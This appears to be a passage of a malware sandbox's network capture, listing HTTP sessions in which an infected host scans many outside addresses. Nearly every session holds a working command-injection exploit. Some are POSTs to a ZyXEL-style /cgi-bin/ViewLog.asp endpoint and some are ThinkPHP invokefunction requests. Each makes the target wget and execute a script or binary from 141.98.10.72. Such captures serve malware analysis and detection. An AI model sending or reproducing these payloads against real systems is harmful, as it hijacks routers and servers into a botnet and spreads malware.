                                                        1172192.168.2.143705894.123.81.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.075797081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1173192.168.2.145027495.86.91.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.082567930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1174192.168.2.145309695.137.152.828080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.092219114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.357412100 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1175192.168.2.143871295.128.41.13980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.197268009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.390618086 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1176192.168.2.143532895.100.82.19080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.204493046 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.405230999 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 30 61 30 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 34 31 26 23 34 36 3b 31 32 36 65 31 62 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d0a0d517&#46;1707899741&#46;126e1bef</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1177192.168.2.145831095.217.92.19680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.224143028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.444372892 CET499INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 305
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 35 2e 31 30 39 2e 36 34 2e 31 35 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at 65.109.64.159 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1178192.168.2.144778685.17.17.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.247363091 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1179192.168.2.145766631.136.230.628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.251085997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.890638113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:43.138731956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:45.762434006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.882292032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.865822077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1180192.168.2.144802231.200.87.1118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.318552017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1181192.168.2.143627494.121.158.1978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.319871902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1182192.168.2.143674694.120.213.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.320214987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1183192.168.2.144397494.120.152.1478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.320614100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1184192.168.2.144491094.122.56.1748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.321865082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1185192.168.2.145659094.120.248.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.321950912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1186192.168.2.144432231.33.8.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.443845034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.050652027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:43.266659975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1187192.168.2.144324495.86.45.19480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.444808006 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1188192.168.2.145371695.57.0.16580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.489443064 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.782424927 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:35:41.782627106 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1189192.168.2.144976431.136.250.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.522484064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.146770954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
